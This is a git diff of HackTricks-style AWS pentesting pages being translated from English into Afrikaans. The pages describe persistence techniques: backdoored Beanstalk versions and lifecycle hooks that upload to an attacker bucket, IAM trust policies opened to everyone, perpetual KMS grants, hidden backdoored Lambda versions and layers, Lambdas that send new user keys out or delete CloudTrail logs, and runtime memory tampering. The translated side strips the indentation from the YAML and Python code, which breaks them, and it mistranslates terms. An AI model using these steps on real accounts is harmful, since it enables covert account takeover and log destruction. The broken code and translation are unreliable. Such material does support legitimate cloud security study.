index c55e0e2ba..62eb63e80 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -1,34 +1,33 @@
-# AWS - Elastic Beanstalk Persistence
+# AWS - Elastic Beanstalk Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Elastic Beanstalk
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
-### Persistence in Instance
+### Persistensie in Instansie
 
-In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
+Om persistensie binne die AWS-rekening te handhaaf, kan 'n **persistensie-meganisme binne die instansie ingevoer word** (cron job, ssh sleutel...) sodat die aanvaller toegang kan verkry en IAM rol **akkrediteer van die metadata diens** kan steel.
 
-### Backdoor in Version
+### Agterdeur in Weergawe
 
-An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+'n Aanvaller kan die kode binne die S3 repo agterdeur sodat dit altyd sy agterdeur en die verwagte kode uitvoer.
 
-### New backdoored version
+### Nuwe agterdeur weergawe
 
-Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+In plaas daarvan om die kode op die werklike weergawe te verander, kan die aanvaller 'n nuwe agterdeur weergawe van die toepassing ontplooi.
 
-### Abusing Custom Resource Lifecycle Hooks
+### Misbruik van Aangepaste Hulpbronne Lewe Siklus Hake
 
 > [!NOTE]
-> TODO: Test
-
-Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
+> TODO: Toets
 
+Elastic Beanstalk bied lewe siklus hake wat jou toelaat om aangepaste skripte tydens instansie voorsiening en beëindiging uit te voer. 'n Aanvaller kan **'n lewe siklus hake konfigureer om periodiek 'n skrip uit te voer wat data eksfiltreer of toegang tot die AWS-rekening handhaaf**.
 ```bash
 bashCopy code# Attacker creates a script that exfiltrates data and maintains access
 echo '#!/bin/bash
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
 
 # Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
 echo 'Resources:
-  AWSEBAutoScalingGroup:
-    Metadata:
-      AWS::ElasticBeanstalk::Ext:
-        TriggerConfiguration:
-          triggers:
-            - name: stealthy-lifecycle-hook
-              events:
-                - "autoscaling:EC2_INSTANCE_LAUNCH"
-                - "autoscaling:EC2_INSTANCE_TERMINATE"
-              target:
-                ref: "AWS::ElasticBeanstalk::Environment"
-              arn:
-                Fn::GetAtt:
-                  - "AWS::ElasticBeanstalk::Environment"
-                  - "Arn"
-  stealthyLifecycleHook:
-    Type: AWS::AutoScaling::LifecycleHook
-    Properties:
-      AutoScalingGroupName:
-        Ref: AWSEBAutoScalingGroup
-      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
-      NotificationTargetARN:
-        Ref: stealthy-lifecycle-hook
-      RoleARN:
-        Fn::GetAtt:
-          - AWSEBAutoScalingGroup
-          - Arn' > stealthy_lifecycle_hook.yaml
+AWSEBAutoScalingGroup:
+Metadata:
+AWS::ElasticBeanstalk::Ext:
+TriggerConfiguration:
+triggers:
+- name: stealthy-lifecycle-hook
+events:
+- "autoscaling:EC2_INSTANCE_LAUNCH"
+- "autoscaling:EC2_INSTANCE_TERMINATE"
+target:
+ref: "AWS::ElasticBeanstalk::Environment"
+arn:
+Fn::GetAtt:
+- "AWS::ElasticBeanstalk::Environment"
+- "Arn"
+stealthyLifecycleHook:
+Type: AWS::AutoScaling::LifecycleHook
+Properties:
+AutoScalingGroupName:
+Ref: AWSEBAutoScalingGroup
+LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+NotificationTargetARN:
+Ref: stealthy-lifecycle-hook
+RoleARN:
+Fn::GetAtt:
+- AWSEBAutoScalingGroup
+- Arn' > stealthy_lifecycle_hook.yaml
 
 # Attacker applies the new environment configuration
 aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
index e3e1944e7..bceb96abf 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -1,53 +1,47 @@
-# AWS - IAM Persistence
+# AWS - IAM Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## IAM
 
-For more information access:
+Vir meer inligting, toegang tot:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-### Common IAM Persistence
+### Algemene IAM Persistensie
 
-- Create a user
-- Add a controlled user to a privileged group
-- Create access keys (of the new user or of all users)
-- Grant extra permissions to controlled users/groups (attached policies or inline policies)
-- Disable MFA / Add you own MFA device
-- Create a Role Chain Juggling situation (more on this below in STS persistence)
+- Skep 'n gebruiker
+- Voeg 'n beheerde gebruiker by 'n bevoorregte groep
+- Skep toegang sleutels (van die nuwe gebruiker of van alle gebruikers)
+- Gee ekstra toestemmings aan beheerde gebruikers/groepe (aangehegte beleide of inline beleide)
+- Deaktiveer MFA / Voeg jou eie MFA-toestel by
+- Skep 'n Rol Ketting Juggling situasie (meer hieroor hieronder in STS persistensie)
 
-### Backdoor Role Trust Policies
-
-You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+### Backdoor Rol Vertroue Beleide
 
+Jy kan 'n backdoor in 'n vertrouensbeleid plaas om dit te kan aanvaar vir 'n eksterne hulpbron wat deur jou beheer word (of vir almal):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": ["*", "arn:aws:iam::123213123123:root"]
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": ["*", "arn:aws:iam::123213123123:root"]
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
+### Backdoor-beleid Weergawe
 
-### Backdoor Policy Version
+Gee Administrateur regte aan 'n beleid in nie sy laaste weergawe nie (die laaste weergawe moet legitiem lyk), en ken dan daardie weergawe van die beleid toe aan 'n beheerde gebruiker/groep.
 
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+### Backdoor / Skep Identiteitsverskaffer
 
-### Backdoor / Create Identity Provider
-
-If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+As die rekening reeds 'n algemene identiteitsverskaffer (soos Github) vertrou, kan die voorwaardes van die vertroue verhoog word sodat die aanvaller dit kan misbruik. 
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
index 7aefbd410..310772cc2 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -1,43 +1,37 @@
-# AWS - KMS Persistence
+# AWS - KMS Volharding
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## KMS
 
-For mor information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
 {{#endref}}
 
-### Grant acces via KMS policies
+### Gee toegang via KMS-beleide
 
-An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+'n Aanvaller kan die toestemming **`kms:PutKeyPolicy`** gebruik om **toegang te gee** tot 'n sleutel aan 'n gebruiker onder sy beheer of selfs aan 'n eksterne rekening. Kyk na die [**KMS Privesc-bladsy**](../aws-privilege-escalation/aws-kms-privesc.md) vir meer inligting.
 
-### Eternal Grant
+### Ewige Toestemming
 
-Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+Toestemmings is 'n ander manier om 'n prinsiep sekere toestemmings oor 'n spesifieke sleutel te gee. Dit is moontlik om 'n toestemming te gee wat 'n gebruiker toelaat om toestemmings te skep. Boonop kan 'n gebruiker verskeie toestemmings (selfs identies) oor dieselfde sleutel hê.
 
-Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
-
-(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+Daarom is dit moontlik vir 'n gebruiker om 10 toestemmings met al die toestemmings te hê. Die aanvaller moet dit konstant monitor. En as op 'n sekere punt 1 toestemming verwyder word, moet nog 10 gegenereer word.
 
+(Ons gebruik 10 en nie 2 nie om te kan opspoor dat 'n toestemming verwyder is terwyl die gebruiker steeds 'n paar toestemmings het)
 ```bash
 # To generate grants, generate 10 like this one
 aws kms create-grant \
-    --key-id <key-id> \
-    --grantee-principal <user_arn> \
-    --operations "CreateGrant" "Decrypt"
+--key-id <key-id> \
+--grantee-principal <user_arn> \
+--operations "CreateGrant" "Decrypt"
 
 # To monitor grants
 aws kms list-grants --key-id <key-id>
 ```
-
 > [!NOTE]
-> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> 'n Toekenning kan slegs toestemmings gee vanaf hierdie: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 1390c2d55..06eb48a41 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -1,68 +1,64 @@
-# AWS - Lambda Persistence
+# AWS - Lambda Persistensie
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## Lambda
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Lambda Layer Persistence
+### Lambda Laag Persistensie
 
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+Dit is moontlik om **'n laag in te voer/terugdeur te maak om arbitrêre kode uit te voer** wanneer die lambda op 'n stil manier uitgevoer word:
 
 {{#ref}}
 aws-lambda-layers-persistence.md
 {{#endref}}
 
-### Lambda Extension Persistence
+### Lambda Uitbreiding Persistensie
 
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Deur Lambda Lae te misbruik, is dit ook moontlik om uitbreidings te misbruik en in die lambda te bly, maar ook versoeke te steel en te wysig.
 
 {{#ref}}
 aws-abusing-lambda-extensions.md
 {{#endref}}
 
-### Via resource policies
+### Deur hulpbronbeleide
 
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+Dit is moontlik om toegang tot verskillende lambda aksies (soos aanroep of kode opdateer) aan eksterne rekeninge te verleen:
 
 <figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
 
-### Versions, Aliases & Weights
+### Weergawes, Aliasse & Gewigte
 
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+'n Lambda kan **verskillende weergawes** hê (met verskillende kode in elke weergawe).\
+Dan kan jy **verskillende aliasse met verskillende weergawes** van die lambda skep en verskillende gewigte aan elkeen toeken.\
+Op hierdie manier kan 'n aanvaller 'n **terugdeur weergawe 1** en 'n **weergave 2 met slegs die wettige kode** skep en **slegs die weergawe 1 in 1%** van die versoeke uitvoer om stil te bly.
 
 <figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
 
-### Version Backdoor + API Gateway
+### Weergave Terugdeur + API Gateway
 
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
-   1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
-   1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
-   1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
+1. Kopieer die oorspronklike kode van die Lambda
+2. **Skep 'n nuwe weergawe wat die** oorspronklike kode terugdeur maak (of net met kwaadwillige kode). Publiseer en **ontplooi daardie weergawe** na $LATEST
+1. Roep die API-gateway wat met die lambda verband hou aan om die kode uit te voer
+3. **Skep 'n nuwe weergawe met die oorspronklike kode**, Publiseer en ontplooi daardie **weergave** na $LATEST.
+1. Dit sal die terugdeurkode in 'n vorige weergawe verberg
+4. Gaan na die API Gateway en **skep 'n nuwe POST-metode** (of kies enige ander metode) wat die terugdeur weergawe van die lambda sal uitvoer: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
+1. Let op die finale :1 van die arn **wat die weergawe van die funksie aandui** (weergave 1 sal die terugdeur een in hierdie scenario wees).
+5. Kies die POST-metode wat geskep is en in Aksies kies **`Ontplooi API`**
+6. Nou, wanneer jy **die funksie via POST aanroep, sal jou Terugdeur** geaktiveer word
 
-### Cron/Event actuator
+### Cron/Event aktuator
 
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+Die feit dat jy **lambda funksies kan laat loop wanneer iets gebeur of wanneer 'n tyd verbygaan** maak lambda 'n goeie en algemene manier om volharding te verkry en opsporing te vermy.\
+Hier is 'n paar idees om jou **teenwoordigheid in AWS meer stil te maak deur lambdas** te skep.
 
-- Every time a new user is created lambda generates a new user key and send it to the attacker.
-- Every time a new role is created lambda gives assume role permissions to compromised users.
-- Every time new cloudtrail logs are generated, delete/alter them
+- Elke keer wanneer 'n nuwe gebruiker geskep word, genereer lambda 'n nuwe gebruikerssleutel en stuur dit na die aanvaller.
+- Elke keer wanneer 'n nuwe rol geskep word, gee lambda aanneemrol toestemmings aan gecompromitteerde gebruikers.
+- Elke keer wanneer nuwe cloudtrail logs gegenereer word, verwyder/wysig hulle
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 71655ada0..26feb4028 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -1,46 +1,42 @@
-# AWS - Abusing Lambda Extensions
+# AWS - Misbruik van Lambda-uitbreidings
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Lambda Extensions
+## Lambda-uitbreidings
 
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda-uitbreidings verbeter funksies deur te integreer met verskeie **monitering, waaksaamheid, sekuriteit en bestuur gereedskap**. Hierdie uitbreidings, wat bygevoeg word via [.zip argiewe met Lambda-lae](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) of ingesluit in [houerbeeld ontplooiings](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), werk in twee modi: **intern** en **ekstern**.
 
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **Interne uitbreidings** meng met die runtime-proses, wat die opstart daarvan manipuleer met behulp van **taalspesifieke omgewing veranderlikes** en **wrapper-skripte**. Hierdie aanpassing geld vir 'n reeks runtimes, insluitend **Java Correto 8 en 11, Node.js 10 en 12, en .NET Core 3.1**.
+- **Eksterne uitbreidings** loop as aparte prosesse, wat die werking in lyn hou met die Lambda-funksie se lewensiklus. Hulle is versoenbaar met verskeie runtimes soos **Node.js 10 en 12, Python 3.7 en 3.8, Ruby 2.5 en 2.7, Java Corretto 8 en 11, .NET Core 3.1**, en **aangepaste runtimes**.
 
-For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+Vir meer inligting oor [**hoe lambda-uitbreidings werk, kyk die dokumentasie**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
 
-### External Extension for Persistence, Stealing Requests & modifying Requests
+### Eksterne Uitbreiding vir Volharding, Diefstal van Versoeke & Modifisering van Versoeke
 
-This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+Dit is 'n opsomming van die tegniek wat in hierdie pos voorgestel word: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
 
-It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.**
+Daar is gevind dat die standaard Linux-kern in die Lambda-runtime-omgewing saamgecompileer is met “**process_vm_readv**” en “**process_vm_writev**” stelsels oproepe. En alle prosesse loop met dieselfde gebruikers-ID, selfs die nuwe proses wat geskep is vir die eksterne uitbreiding. **Dit beteken dat 'n eksterne uitbreiding volle lees- en skryfgemagtiging het tot Rapid se heap-geheue, volgens ontwerp.**
 
-Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+Boonop, terwyl Lambda-uitbreidings die vermoë het om **in te teken op aanroepgebeurtenisse**, openbaar AWS nie die rou data aan hierdie uitbreidings nie. Dit verseker dat **uitbreidings nie toegang het tot sensitiewe inligting** wat via die HTTP-versoek oorgedra word.
 
-The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+Die Init (Rapid) proses monitor alle API-versoeke by [http://127.0.0.1:9001](http://127.0.0.1:9001/) terwyl Lambda-uitbreidings geïnitialiseer en uitgevoer word voordat enige runtime-kode uitgevoer word, maar na Rapid.
 
 <figure><img src="../../../../images/image (254).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png</a></p></figcaption></figure>
 
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+Die veranderlike **`AWS_LAMBDA_RUNTIME_API`** dui die **IP** adres en **poort** nommer van die Rapid API aan **kind runtime prosesse** en addisionele uitbreidings.
 
 > [!WARNING]
-> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+> Deur die **`AWS_LAMBDA_RUNTIME_API`** omgewing veranderlike na 'n **`poort`** wat ons toegang tot het, is dit moontlik om alle aksies binne die Lambda-runtime te onderskep (**man-in-the-middle**). Dit is moontlik omdat die uitbreiding met dieselfde voorregte as Rapid Init loop, en die stelselkern toelaat **modifikasie van prosesgeheue**, wat die verandering van die poortnommer moontlik maak.
 
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+Omdat **uitbreidings voor enige runtime-kode loop**, sal die modifikasie van die omgewing veranderlike die runtime-proses (bv. Python, Java, Node, Ruby) beïnvloed soos dit begin. Verder, **uitbreidings wat na** ons gelaai word, wat op hierdie veranderlike staatmaak, sal ook deur ons uitbreiding lei. Hierdie opstelling kan malware in staat stel om sekuriteitsmaatreëls of registrasie-uitbreidings heeltemal te omseil direk binne die runtime-omgewing.
 
 <figure><img src="../../../../images/image (267).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png</a></p></figcaption></figure>
 
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
+Die hulpmiddel [**lambda-spy**](https://github.com/clearvector/lambda-spy) is geskep om daardie **geheue skrywe** en **sensitiewe inligting** van lambda versoeke te steel, ander **uitbreidings** **versoeke** en selfs **te modifiseer**.
 
-## References
+## Verwysings
 
 - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
 - [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index f8a5e2868..c6d9bced4 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -4,79 +4,72 @@
 
 ## Lambda Layers
 
-A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+'n Lambda-laag is 'n .zip-lêerargief wat **addisionele kode** of ander inhoud **kan bevat**. 'n Laag kan biblioteke, 'n [aangepaste runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data of konfigurasielêers bevat.
 
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+Dit is moontlik om tot **vyf lae per funksie** in te sluit. Wanneer jy 'n laag in 'n funksie insluit, word die **inhoud na die `/opt`** gids in die uitvoeringsomgewing **onttrek**.
 
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+Deur **standaard** is die **lae** wat jy skep **privaat** vir jou AWS-rekening. Jy kan kies om 'n laag met ander rekeninge te **deel** of om die laag **publiek** te **maak**. As jou funksies 'n laag gebruik wat 'n ander rekening gepubliseer het, kan jou funksies **voortgaan om die laag weergawe te gebruik nadat dit verwyder is, of nadat jou toestemming om toegang tot die laag te verkry, ingetrek is**. Jy kan egter nie 'n nuwe funksie skep of funksies opdateer wat 'n verwyderde laag weergawe gebruik nie.
 
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+Funksies wat as 'n houerbeeld ontplooi word, gebruik nie lae nie. In plaas daarvan, pak jy jou verkiesde runtime, biblioteke en ander afhanklikhede in die houerbeeld wanneer jy die beeld bou.
 
 ### Python load path
 
-The load path that Python will use in lambda is the following:
-
+Die laai-pad wat Python in lambda sal gebruik, is die volgende:
 ```
 ['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
 ```
-
-Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
+Kontroleer hoe die **tweede** en derde **posisies** beset word deur gidse waar **lambda layers** hul lêers ontsyfer: **`/opt/python/lib/python3.9/site-packages`** en **`/opt/python`**
 
 > [!CAUTION]
-> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation.
+> As 'n aanvaller daarin slaag om 'n gebruikte lambda **layer** te **backdoor** of **een toe te voeg** wat **arbitraire kode sal uitvoer wanneer 'n algemene biblioteek gelaai word**, sal hy in staat wees om kwaadwillige kode met elke lambda-aanroep uit te voer.
 
-Therefore, the requisites are:
+Daarom is die vereistes:
 
-- **Check libraries** that are **loaded** by the victims code
-- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library.
+- **Kontroleer biblioteke** wat deur die slagofferskode **gelaai** word
+- Skep 'n **proxy-biblioteek met lambda layers** wat **aangepaste kode sal uitvoer** en die **oorspronklike** biblioteek **sal laai**.
 
-### Preloaded libraries
+### Vooraf gelaaide biblioteke
 
 > [!WARNING]
-> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\
-> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
-
-With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
+> Wanneer ek hierdie tegniek misbruik, het ek 'n moeilikheid gevind: Sommige biblioteke is **reeds gelaai** in die python runtime wanneer jou kode uitgevoer word. Ek het verwag om dinge soos `os` of `sys` te vind, maar **selfs die `json` biblioteek was gelaai**.\
+> Ten einde hierdie volhardingstegniek te misbruik, moet die kode 'n **nuwe biblioteek laai wat nie gelaai is** wanneer die kode uitgevoer word nie.
 
+Met 'n python kode soos hierdie is dit moontlik om die **lys van biblioteke wat vooraf gelaai is** binne python runtime in lambda te verkry:
 ```python
 import sys
 
 def lambda_handler(event, context):
-    return {
-        'statusCode': 200,
-        'body': str(sys.modules.keys())
-    }
+return {
+'statusCode': 200,
+'body': str(sys.modules.keys())
+}
 ```
-
-And this is the **list** (check that libraries like `os` or `json` are already there)
-
+En dit is die **lys** (kontroleer dat biblioteke soos `os` of `json` reeds daar is)
 ```
 'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 